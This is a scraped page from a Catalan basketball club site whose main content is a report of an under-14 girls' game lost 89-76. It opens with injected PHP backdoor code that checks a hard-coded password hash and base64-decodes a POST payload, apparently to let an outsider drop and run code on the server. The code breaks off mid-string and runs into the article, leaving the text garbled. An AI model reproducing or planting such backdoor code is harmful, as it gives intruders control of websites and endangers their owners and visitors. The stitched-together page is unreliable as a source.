function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil Femení 08A, en un partit molt igualat, es queda a les portes de la seva primera victòria (89-76) - Tgn Bàsquet Club -

L’Infantil Femení 08A, en un partit molt igualat, es queda a les portes de la seva primera victòria (89-76)

Updated: octubre 20, 2021

L’Infantil Femení 08A va perdre, tot i arribar al descans guanyant per set punts (37- 44). Les liles van començar concentrades i amb confiança un matx que es preveia igualat. Però, tot i el bon inici, en la tornada del descans, les tarragonines es van relaxar i van baixar el ritme defensiu, cosa que les rivals van aprofitar per recuperar el control del partit. Les jugadores entrenades per García van pecar de jugar massa ràpid i amb moltes accions individuals quan encara quedaven molts minuts per davant, fet que les va perjudiacar. Tot i això va destacar la jugadora Ecija que va encarar els uns contra uns amb valentia, amb un total de 25 punts, i va estirar de l’equip durant molts minuts. El partit va estar marcat per un nombre molt excessiu de faltes, que va acabar amb un total 94 tirs lliures tirats entre els dos equips. Això també va provocar moltes aturades en el ritme del partit i el va fer molt més llarg del normal. A l’últim quart la meitat de les jugadores del TGN van acabar expulsades.